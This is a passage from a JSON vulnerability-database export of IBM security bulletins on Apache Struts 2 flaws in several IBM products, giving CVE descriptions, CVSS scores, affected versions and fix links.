"CVE-2013-2248", "CVE-2013-2251"], "modified": "2022-09-26T22:21:32", "id": "E76EDE876E613BFC954CF35B3BAEC06C0673334FEC47193E6686A3BF544CDE1D", "href": "https://www.ibm.com/support/pages/node/689363", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:52", "description": "## Summary\n\nSeveral security vulnerabilities have been reported against Apache Struts 2 through May 2014. IBM Platform Symphony\u2019s GUI uses Struts 2 as a framework for Java web applications. A version of the package that is vulnerable to these issues is included in several past versions of IBM Platform Symphony. The latest versions of Struts 2 address all the vulnerabilities and can be applied through the fix detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID: **[__CVE-2014-0094 __](<https://vulners.com/cve/CVE-2014-0094>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \n \nCVE-2014-0094 \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/92205_](<http://xforce.iss.net/xforce/xfdb/92205>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N) \n \n**CVEID: **[__CVE-2014-0112 __](<https://vulners.com/cve/CVE-2014-0112>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \n \nCVE-ID: CVE-2014-0112 \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/92740_](<http://xforce.iss.net/xforce/xfdb/92740>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVEID: **[__CVE-2014-0113 __](<https://vulners.com/cve/CVE-2014-0113>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \n \nCVE-ID: CVE-2014-0113 \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/92742_](<http://xforce.iss.net/xforce/xfdb/92742>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVEID: **[__CVE-2014-0116 __](<https://vulners.com/cve/CVE-2014-0116>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \n \nCVE-ID: CVE-2014-0116 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/93024_](<http://xforce.iss.net/xforce/xfdb/93024>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n**Affected Products and Versions** \nIBM Platform Symphony 5.2, 6.1.x \n \n \n**Remediation/Fixes ** \n \nWe strongly recommend that you apply the following fix from FixCentral to avoid this potential security exposure. \n \n\n\n_Product_| _VRMF_| _Fix Number_ \n---|---|--- \nIBM Platform Symphony| _5.2, 6.1.x_| #234633 \n \n \n**Workarounds and Mitigations** \nNone \n \n**Reference** \n[](<https://www-304.ibm.com/support/docview.wss?uid=swg21496117&wv=1>)[\u00b7 __Complete CVSS Guide__](<http://www.first.org/cvss/v2/guide>) \n[\u00b7 __On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _ \n \n**Related Information** \n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n \n**Acknowledgement** \nNone \n \n**Change History** \n31 May, 2014 Original Copy Published \n \n\n\n_*_The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin._ _\n\n \n**Disclaimer** \n \nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. \n\n## ", "cvss3": {}, "published": "2018-06-18T01:25:07", "type": "ibm", "title": "Security Bulletin: IBM Platform Symphony (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116"], "modified": "2018-06-18T01:25:07", "id": "76FF52EA4C6CD7649F1D390FCF31D87F0192327E3F142514A23D24C630BBDD85", "href": "https://www.ibm.com/support/pages/node/679031", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-12T09:36:43", "description": "## Summary\n\nMultiple vulnerabilities in Apache Struts 2.3.x may affect IBM eDiscovery Manager. These are addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223990](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223990>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \neDiscovery Manager| 2.2.2 \n \n## Remediation/Fixes\n\nProduct\n\n| VRM| Remediation \n---|---|--- \nIBM eDiscovery Manager| 2.2.2| \n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-WIN-IF008&source=SAR> \"Interim Fix 008\" ) for Windows\n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF008&source=SAR> \"Interim Fix 008\" ) for AIX \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T10:00:46", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Apache Struts Affect IBM eDiscovery Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-07-12T10:00:46", "id": "80737D4B4CE626670083B16CA387FEFAC8045ECB16DACD55AD56FFAC544F21A4", "href": "https://www.ibm.com/support/pages/node/7011373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-29T21:26:09", "description": "## Abstract\n\nIBM Storwize V7000 Unified includes fixes for security vulnerabilities in IBM Storwize V7000. \nAdministrative access to the IBM Storwize V7000 via the IP interface may be obtained without authentication. \n\n## Content\n\n \nPlease note that below vulnerabilities are applicable to IBM Storwize V7000 GUI, and do not affect Storwize V7000 Unified GUI. \n \n**VULNERABILITY DETAILS: ** \n \n**CVEID: ** CVE-2013-4310 \n \n**DESCRIPTION: ** \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. \n \n[_CVE-2013-4310_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4310>) \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [](<http://xforce.iss.net/xforce/xfdb/54643>)[_http://xforce.iss.net/xforce/xfdb/87336_](<http://xforce.iss.net/xforce/xfdb/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n**CVEID: ** CVE-2013-4316 \n \n**DESCRIPTION: ** \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \n_ \n_[_CVE-2013-4316_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4316>) \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87373_](<http://xforce.iss.net/xforce/xfdb/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n \n**AFFECTED PLATFORMS: **\n\n * **_Affected releases:_** IBM Storwize V7000 Unified 1.3.0.0 through 1.4.2.0. \n * **_Releases/systems/configurations NOT affected:_** IBM Storwize V7000 Unified 1.4.2.1 and above.\n\n**REMEDIATION: **\n\n**_ \nVendor Fix(es):_** The issues were fixed beginning with version IBM Storwize V7000 Unified 1.4.2.1. IBM Storwize V7000 Unified customers running an earlier version must upgrade to IBM Storwize V7000 Unified 1.4.2.1 or a later version in order to get these fixes. \n \n**_ \nWorkaround(s):_** None. \n \n**_ \nMitigation(s):_**Access to the Storwize V7000 management IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability.\n\n \n \n \n**REFERENCES: **\n\n * [](<https://www-304.ibm.com/support/docview.wss?uid=swg21496117&wv=1>)[__Complete CVSS Guide__](<http://www.first.org/cvss/v2/guide>)\n * [__On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _\n \n \n**RELATED INFORMATION: **\n\n * [_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)\n * [_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>)\n \n \n**CHANGE HISTORY**\n\n * 12-12-2013: Original Copy Published\n \n \n\n\n_*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash. _\n\n \n**_Note: _**_According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" _ \n_IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY._\n\n[{\"Product\":{\"code\":\"ST5Q4U\",\"label\":\"IBM Storwize V7000 Unified (2073)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"1.4\",\"Platform\":[{\"code\":\"\",\"label\":\"IBM Storwize V7000\"}],\"Version\":\"1.3;1.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {}, "published": "2022-09-26T04:23:14", "type": "ibm", "title": "Security Bulletin: IBM Storwize V7000 Unified V1.4.2.1 Includes Fixes for IBM Storwize V7000 Security Vulnerabilities (CVE-2013-4310 CVE-2013-4316)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2022-09-26T04:23:14", "id": "32DCD35C3BB7B9808D44714AAD5E5C0933C76D0D44C2BAABB1E72D83748235D2", "href": "https://www.ibm.com/support/pages/node/689373", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-22T01:47:10", "description": "## Summary\n\nSecurity Bulletin: Intelligent Clusters Security Bulletin, 1410\n\n## Vulnerability Details\n\n## Security Bulletin \n \n--- \n \nSummary \n--- \n \nAdministrative access to the system via the IP interface may be obtained without authentication.\n\n## Vulnerability Details \n \n--- \n \n**CVEID:** CVE-2013-4310 CVE-2013-4316 \n**DESCRIPTION:** \n \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. \n \n[_CVE-2013-4310_](<https://vulners.com/cve/CVE-2013-4310>) \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87336_](<http://xforce.iss.net/xforce/xfdb/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n**DESCRIPTION:** \n \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \n \n[_CVE-2013-4316_](<https://vulners.com/cve/CVE-2013-4316>) \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87373_](<http://xforce.iss.net/xforce/xfdb/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions \n \n--- \n \nIBM SAN Volume Controller \nStorwize V7000 for Lenovo \nStorwize V5000 for Lenovo \nStorwize V3700 for Lenovo \nStorwize V3500 for Lenovo \n \nAll products affected when running a version below V6.4.1.7 or V7.1.0.6.\n\n## Remediation/Fixes \n \n--- \n \nFor IBM SAN Volume Controller, Storwize V7000, V5000, V3700 and V3500 for Lenovo and IBM Flex System V7000, install the V6.4.1.7 or V7.1.0.6 PTF level or higher.\n\n## Workarounds and Mitigations \n \n--- \n \nAccess to the system's IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability.\n\n## ", "cvss3": {}, "published": "2019-01-24T12:40:01", "type": "ibm", "title": "Security Bulletin: Intelligent Clusters Security Bulletin, 1410", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2019-01-24T12:40:01", "id": "4A381BCE879007EE4A86AB36C442564101BE6658BEA8959F0008297BA94F8BE4", "href": "https://www.ibm.com/support/pages/node/812734", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T10:48:12", "description": "## Summary\n\nSecurity Bulletin: IBM SAN Volume Controller and Storwize Family security vulnerabilities (CVE-2013-4310 CVE-2013-4316)\n\n## Vulnerability Details\n\n## Security Bulletin \n \n--- \n \nSummary \n--- \n \nAdministrative access to the system via the IP interface may be obtained without authentication.\n\n## Vulnerability Details \n \n--- \n \n**CVEID:** CVE-2013-4310 CVE-2013-4316 \n**DESCRIPTION:** \n \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. \n \n[_CVE-2013-4310_](<https://vulners.com/cve/CVE-2013-4310>) \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87336_](<http://xforce.iss.net/xforce/xfdb/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n**DESCRIPTION:** \n \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \n \n[_CVE-2013-4316_](<https://vulners.com/cve/CVE-2013-4316>) \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87373_](<http://xforce.iss.net/xforce/xfdb/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions \n \n--- \n \nIBM SAN Volume Controller \nStorwize V7000 for Lenovo \nStorwize V5000 for Lenovo \nStorwize V3700 for Lenovo \nStorwize V3500 for Lenovo \n \nAll products affected when running a version below V6.4.1.7 or V7.1.0.6.\n\n## Remediation/Fixes \n \n--- \n \nFor IBM SAN Volume Controller, Storwize V7000, V5000, V3700 and V3500 for Lenovo and IBM Flex System V7000, install the V6.4.1.7 or V7.1.0.6 PTF level or higher.\n\n## Workarounds and Mitigations \n \n--- \n \nAccess to the system's IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability.\n\n## ", "cvss3": {}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: IBM SAN Volume Controller and Storwize Family security vulnerabilities (CVE-2013-4310 CVE-2013-4316)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2023-03-29T01:48:02", "id": "B4FD409846BC477F7E2953E4C8F960515DC4E0D5564EB720E28E817DE28FA2C0", "href": "https://www.ibm.com/support/pages/node/866010", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T13:50:53", "description": "## Summary\n\nIBM Sterling Order Management, IBM Sterling Configure Price Quote and Sterling Web Channel use Apache Struts 2 and are affected by some of the vulnerabilities that exist in Apache Struts 2. \nNow a vulnerability related to Apache Commons FileUpload version included with Apache Struts 2.\n\n## Vulnerability Details\n\n * * CVEID: [_CVE-2014-0112_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0112>)** \n \nDescription:** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92740> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n * * CVEID: [_CVE-2014-0113_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0113>)** \n \nDescription: ** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92742> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n * CVEID: [_CVE-2014-0094_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0094>)** \n \nDescription:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \n \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92205> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N)\n * * CVEID: [_CVE-2014-0050_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050>)** \n \nDescription: ** \nApache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \n \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90987> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:N/A:P) \n\n\n## Affected Products and Versions\n\nSterling Order Management 8.5 \nIBM Sterling Selling and Fulfillment Foundation 9.0 \nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Field Sales 9.0 \nIBM Sterling Field Sales 9.1.0 \nIBM Sterling Field Sales 9.2.0 \nIBM Sterling Field Sales 9.2.1 \nIBM Sterling Field Sales 9.3.0 \nSterling Web Channel 9.0 \nSterling Web Channel 9.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix packs, the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| **_How to acquire fix_** \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0- SFP2_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1-SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.0.0| **_9.0.0- SFP3_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nSterling Order Management 8.5| **_8.5- SFP3_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nIBM Sterling Field Sales 9.0| **_SFS9.0-SFP3_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nIBM Sterling Field Sales 9.1.0| **_SFS9.1.0-_** **_SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF_** \n \nIBM Sterling Field Sales 9.2.0| **_SFS9.2.0- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF_** \n \nIBM Sterling Field Sales 9.2.1| **_SFS9.2.1- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF_** \n \nSterling Web Channel| **_9.0.0-FP6_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF_** \n \nSterling Web Channel| **_9.1.0- FP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_**\n\n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n18/06/2014 : Original Copy Published \n08/07/2014: Removed Sterling Field Sales 9.3 and replaced with Sterling Selling and Fulfillment Foundation 9.3.0. \n24/07/2014: Changes include: \n\\- Added vulnerability CVE-2014-0050 under Vulnerability Details \n\\- Added IBM Sterling Field Sales 9.3.0 under Affected Products and Versions and Remediation/Fixes \n\\- Updated fix versions for following products under Remediation/Fixes. Old version in parentheses: \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 - (9.3.0- SFP1) \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 - (9.2.1- SFP2) \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 - (9.2.0- SFP2) \nIBM Sterling Selling and Fulfillment Foundation 9.1.0 - (9.1.0- SFP2) \nIBM Sterling Selling and Fulfillment Foundation 9.0.0 - (9.0.0- SFP2) \nSterling Order Management 8.5 - (8.5- 